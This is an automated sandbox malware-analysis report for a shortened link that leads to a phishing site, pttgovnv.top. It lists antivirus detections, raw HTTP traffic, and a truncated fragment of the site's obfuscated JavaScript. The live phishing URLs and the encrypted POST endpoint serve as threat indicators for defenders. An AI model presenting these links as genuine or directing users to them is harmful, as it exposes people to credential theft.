Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://is.gd/pttgovnvv

Overview

General Information

Sample URL:http://is.gd/pttgovnvv
Analysis ID:1502515
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
HTML page contains obfuscated javascript

Classification

  • System is w10x64
  • chrome.exe (PID: 4304 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 928 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2088,i,12425730417915934961,13765664541890287119,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6472 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://is.gd/pttgovnvv" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://is.gd/pttgovnvvAvira URL Cloud: detection malicious, Label: phishing
Source: http://is.gd/pttgovnvvSlashNext: detection malicious, Label: Fraudulent Website type: Phishing & Social Engineering
Source: https://pttgovnv.top/help/assets/cbcdcea5JxKnW.jsAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/assets/37d8eb31JxKnW.jsAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/assets/2dd339f2kFGym.cssAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/assets/c16a2af0JxKnW.jsAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/assets/77985128JxKnW.jsAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/assets/09bf01f8JxKnW.jsAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/assets/ec21517bJxKnW.jsAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/api/MC45NTAzNDk0MzkyMzA0MDQ4Avira URL Cloud: Label: phishing
Source: https://pttgovnv.top/helpAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/assets/index-f5457718.jsAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/assets/c27b6911JxKnW.jsAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/assets/f3c7e6fbJxKnW.jsAvira URL Cloud: Label: phishing
Source: https://is.gd/pttgovnvvAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/favicon.icoAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/assets/4cd1ec68kFGym.cssAvira URL Cloud: Label: phishing
Source: http://pttgovnv.top/helpAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/assets/0e738ae1JxKnW.jsAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/assets/f6170fbbkFGym.cssAvira URL Cloud: Label: phishing
Source: https://is.gd/pttgovnvvVirustotal: Detection: 6%Perma Link
Source: http://is.gd/pttgovnvvVirustotal: Detection: 13%Perma Link

Phishing

barindex
Source: https://pttgovnv.top/help/assets/37d8eb31JxKnW.jsHTTP Parser: const a9_0x13d023=a9_0x3647;(function(_0x1c0f4c,_0x5b4f7e){const _0x18c0e3=a9_0x3647,_0x35d09c=_0x1c
Source: https://pttgovnv.top/help/HTTP Parser: No favicon
Source: https://pttgovnv.top/help/HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /pttgovnvv HTTP/1.1Host: is.gdConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/ HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/f6170fbbkFGym.css HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/index-f5457718.js HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttgovnv.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /help/assets/77985128JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttgovnv.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/37d8eb31JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttgovnv.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/index-f5457718.js HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/77985128JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/2dd339f2kFGym.css HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/4cd1ec68kFGym.css HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/c16a2af0JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttgovnv.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/09bf01f8JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttgovnv.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/ec21517bJxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttgovnv.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/f3c7e6fbJxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttgovnv.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/37d8eb31JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/09bf01f8JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/c27b6911JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttgovnv.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/ec21517bJxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/c16a2af0JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/cbcdcea5JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttgovnv.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/f3c7e6fbJxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/c27b6911JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/cbcdcea5JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/0e738ae1JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttgovnv.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/MC45NTAzNDk0MzkyMzA0MDQ4 HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: is.gd
Source: global trafficDNS traffic detected: DNS query: pttgovnv.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: unknownHTTP traffic detected: POST /api/MC45NTAzNDk0MzkyMzA0MDQ4 HTTP/1.1Host: pttgovnv.topConnection: keep-aliveContent-Length: 292sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: text/encryptAccept: */*Origin: https://pttgovnv.topSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 01 Sep 2024 22:28:25 GMTTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4zfsROfFYHjD7zezXmHRpnVd3QrL8xEF311IMIqrMqqlNXLSLqi4Ux5R%2BEREmu8zWFI5PUp3T8H7x%2FJgnMV3NfjnI%2FRXPsij1V%2FxrGvw7H9liAgF4YsLplOdSDHYBEY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bc8b17c5fe943ab-EWRalt-svc: h3=":443"; ma=86400
Source: chromecache_64.2.drString found in binary or memory: http://daneden.me/animate
Source: chromecache_64.2.drString found in binary or memory: http://fontawesome.io
Source: chromecache_64.2.drString found in binary or memory: http://fontawesome.io/license
Source: chromecache_64.2.drString found in binary or memory: http://getbootstrap.com)
Source: chromecache_64.2.drString found in binary or memory: http://ianlunn.co.uk/
Source: chromecache_64.2.drString found in binary or memory: http://ianlunn.github.io/Hover/)
Source: chromecache_64.2.drString found in binary or memory: http://jqueryui.com
Source: chromecache_64.2.drString found in binary or memory: http://jqueryui.com/themeroller/?bgShadowXPos=&bgOverlayXPos=&bgErrorXPos=&bgHighlightXPos=&bgConten
Source: chromecache_64.2.drString found in binary or memory: http://www.opensource.org/licenses/mit-license.php
Source: chromecache_64.2.drString found in binary or memory: https://github.com/IanLunn/Hover
Source: chromecache_64.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
